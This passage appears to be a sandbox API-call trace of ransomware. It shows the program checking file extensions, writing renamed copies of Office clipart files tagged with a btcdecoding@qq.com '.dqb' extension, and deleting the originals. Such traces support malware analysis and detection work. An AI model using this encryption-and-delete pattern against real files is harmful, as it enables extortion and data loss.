(lpString=".jpg") returned 4 [0050.569] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.569] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.569] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.569] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0050.569] GetLastError () returned 0x0 [0050.569] ReadFile (in: hFile=0x1dc, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x135b, lpOverlapped=0x0) returned 1 [0050.573] WriteFile (in: hFile=0x228, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x1360, lpOverlapped=0x0) returned 1 [0050.574] ReadFile (in: hFile=0x1dc, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.574] WriteFile (in: hFile=0x228, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.574] SetEndOfFile (hFile=0x228) returned 1 [0050.574] CloseHandle (hObject=0x228) returned 1 [0050.574] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.574] SetEndOfFile (hFile=0x1dc) returned 1 [0050.575] CloseHandle (hObject=0x1dc) returned 1 [0050.575] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0050.575] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif")) returned 1 [0050.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0050.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0050.576] lstrlenW (lpString=".doc") returned 4 [0050.576] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.576] lstrlenW (lpString=".docx") returned 5 [0050.576] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.576] lstrlenW (lpString=".pdf") returned 4 [0050.576] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.576] lstrlenW (lpString=".xls") returned 4 [0050.576] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.576] lstrlenW (lpString=".xlsx") returned 5 [0050.576] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.576] lstrlenW (lpString=".ppt") returned 4 [0050.576] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0050.576] lstrlenW (lpString=".zip") returned 4 [0050.576] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.576] lstrlenW (lpString=".rar") returned 4 [0050.576] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.576] lstrlenW (lpString=".bz2") returned 4 [0050.576] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.576] lstrlenW (lpString=".7z") returned 3 [0050.576] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0050.576] lstrlenW (lpString=".dbf") returned 4 [0050.576] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0050.576] lstrlenW (lpString=".1cd") returned 4 [0050.576] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0050.576] lstrlenW (lpString=".jpg") returned 4 [0050.576] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.577] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.577] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.577] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0050.577] GetLastError () returned 0x0 [0050.577] ReadFile (in: hFile=0x1dc, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x13a6, lpOverlapped=0x0) returned 1 [0050.580] WriteFile (in: hFile=0x228, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x13b0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x13b0, lpOverlapped=0x0) returned 1 [0050.581] ReadFile (in: hFile=0x1dc, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.581] WriteFile (in: hFile=0x228, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.581] SetEndOfFile (hFile=0x228) returned 1 [0050.581] CloseHandle (hObject=0x228) returned 1 [0050.581] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.581] SetEndOfFile (hFile=0x1dc) returned 1 [0050.582] CloseHandle (hObject=0x1dc) returned 1 [0050.582] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0050.582] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif")) returned 1 [0050.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0050.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0050.582] lstrlenW (lpString=".doc") returned 4 [0050.582] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.582] lstrlenW (lpString=".docx") returned 5 [0050.582] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.582] lstrlenW (lpString=".pdf") returned 4 [0050.582] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.582] lstrlenW (lpString=".xls") returned 4 [0051.030] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.030] lstrlenW (lpString=".xlsx") returned 5 [0051.030] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.030] lstrlenW (lpString=".ppt") returned 4 [0051.030] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0051.030] lstrlenW (lpString=".zip") returned 4 [0051.030] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.030] lstrlenW (lpString=".rar") returned 4 [0051.030] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.030] lstrlenW (lpString=".bz2") returned 4 [0051.030] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.030] lstrlenW (lpString=".7z") returned 3 [0051.030] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0051.030] lstrlenW (lpString=".dbf") returned 4 [0051.030] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0051.030] lstrlenW (lpString=".1cd") returned 4 [0051.030] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0051.030] lstrlenW (lpString=".jpg") returned 4 [0051.030] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.031] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.031] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.031] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00965_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0051.031] GetLastError () returned 0x0 [0051.031] ReadFile (in: hFile=0x20c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x1ba0, lpOverlapped=0x0) returned 1 [0051.033] WriteFile (in: hFile=0x160, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x1bb0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x1bb0, lpOverlapped=0x0) returned 1 [0051.034] ReadFile (in: hFile=0x20c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.034] WriteFile (in: hFile=0x160, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.034] SetEndOfFile (hFile=0x160) returned 1 [0051.034] CloseHandle (hObject=0x160) returned 1 [0051.034] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.034] SetEndOfFile (hFile=0x20c) returned 1 [0051.035] CloseHandle (hObject=0x20c) returned 1 [0051.035] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.035] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00965_.wmf")) returned 1 [0051.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63 [0051.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63 [0051.035] lstrlenW (lpString=".doc") returned 4 [0051.036] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0051.036] lstrlenW (lpString=".docx") returned 5 [0051.036] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0051.036] lstrlenW (lpString=".pdf") returned 4 [0051.036] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0051.036] lstrlenW (lpString=".xls") returned 4 [0051.036] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0051.036] lstrlenW (lpString=".xlsx") returned 5 [0051.036] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0051.036] lstrlenW (lpString=".ppt") returned 4 [0051.036] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0051.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63 [0051.036] lstrlenW (lpString=".zip") returned 4 [0051.036] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0051.036] lstrlenW (lpString=".rar") returned 4 [0051.036] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0051.036] lstrlenW (lpString=".bz2") returned 4 [0051.036] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0051.036] lstrlenW (lpString=".7z") returned 3 [0051.036] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0051.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63 [0051.036] lstrlenW (lpString=".dbf") returned 4 [0051.036] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0051.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63 [0051.036] lstrlenW (lpString=".1cd") returned 4 [0051.036] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0051.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63 [0051.036] lstrlenW (lpString=".jpg") returned 4 [0051.036] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0051.037] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.037] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.037] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01039_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0051.037] GetLastError () returned 0x0 [0051.037] ReadFile (in: hFile=0x20c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0xd10, lpOverlapped=0x0) returned 1 [0051.038] WriteFile (in: hFile=0x160, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xd20, lpOverlapped=0x0) returned 1 [0051.039] ReadFile (in: hFile=0x20c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.039] WriteFile (in: hFile=0x160, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.039] SetEndOfFile (hFile=0x160) returned 1 [0051.039] CloseHandle (hObject=0x160) returned 1 [0051.040] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.040] SetEndOfFile (hFile=0x20c) returned 1 [0051.040] CloseHandle (hObject=0x20c) returned 1 [0051.040] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.041] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01039_.wmf")) returned 1 [0051.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63 [0051.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63 [0051.041] lstrlenW (lpString=".doc") returned 4 [0051.041] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0051.041] lstrlenW (lpString=".docx") returned 5 [0051.041] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0051.041] lstrlenW (lpString=".pdf") returned 4 [0051.041] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0051.041] lstrlenW (lpString=".xls") returned 4 [0051.041] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0051.041] lstrlenW (lpString=".xlsx") returned 5 [0051.041] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0051.041] lstrlenW (lpString=".ppt") returned 4 [0051.041] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0051.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63 [0051.041] lstrlenW (lpString=".zip") returned 4 [0051.041] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0051.041] lstrlenW (lpString=".rar") returned 4 [0051.041] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0051.041] lstrlenW (lpString=".bz2") returned 4 [0051.041] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0051.041] lstrlenW (lpString=".7z") returned 3 [0051.042] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0051.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63 [0051.042] lstrlenW (lpString=".dbf") returned 4 [0051.042] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0051.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63 [0051.042] lstrlenW (lpString=".1cd") returned 4 [0051.042] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0051.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63 [0051.042] lstrlenW (lpString=".jpg") returned 4 [0051.042] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0051.042] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.042] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.042] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01044_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0051.042] GetLastError () returned 0x0 [0051.042] ReadFile (in: hFile=0x20c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x63c, lpOverlapped=0x0) returned 1 [0051.044] WriteFile (in: hFile=0x160, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x640, lpOverlapped=0x0) returned 1 [0051.047] ReadFile (in: hFile=0x20c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.047] WriteFile (in: hFile=0x160, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.047] SetEndOfFile (hFile=0x160) returned 1 [0051.047] CloseHandle (hObject=0x160) returned 1 [0051.047] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.047] SetEndOfFile (hFile=0x20c) returned 1 [0051.048] CloseHandle (hObject=0x20c) returned 1 [0051.048] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.048] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01044_.wmf")) returned 1 [0051.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63 [0051.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63 [0051.049] lstrlenW (lpString=".doc") returned 4 [0051.049] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0051.049] lstrlenW (lpString=".docx") returned 5 [0051.049] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0051.049] lstrlenW (lpString=".pdf") returned 4 [0051.049] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0051.049] lstrlenW (lpString=".xls") returned 4 [0051.049] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0051.049] lstrlenW (lpString=".xlsx") returned 5 [0051.049] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0051.049] lstrlenW (lpString=".ppt") returned 4 [0051.049] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0051.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63 [0051.049] lstrlenW (lpString=".zip") returned 4 [0051.049] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0051.049] lstrlenW (lpString=".rar") returned 4 [0051.049] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0051.049] lstrlenW (lpString=".bz2") returned 4 [0051.049] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0051.049] lstrlenW (lpString=".7z") returned 3 [0051.049] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0051.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63 [0051.049] lstrlenW (lpString=".dbf") returned 4 [0051.049] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0051.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63 [0051.049] lstrlenW (lpString=".1cd") returned 4 [0051.049] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0051.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63 [0051.049] lstrlenW (lpString=".jpg") returned 4 [0051.049] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0051.050] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.051] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.051] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01060_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0051.051] GetLastError () returned 0x0 [0051.051] ReadFile (in: hFile=0x20c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x1f20, lpOverlapped=0x0) returned 1 [0051.052] WriteFile (in: hFile=0x160, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x1f30, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x1f30, lpOverlapped=0x0) returned 1 [0051.053] ReadFile (in: hFile=0x20c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.053] WriteFile (in: hFile=0x160, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.054] SetEndOfFile (hFile=0x160) returned 1 [0051.054] CloseHandle (hObject=0x160) returned 1 [0051.054] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.054] 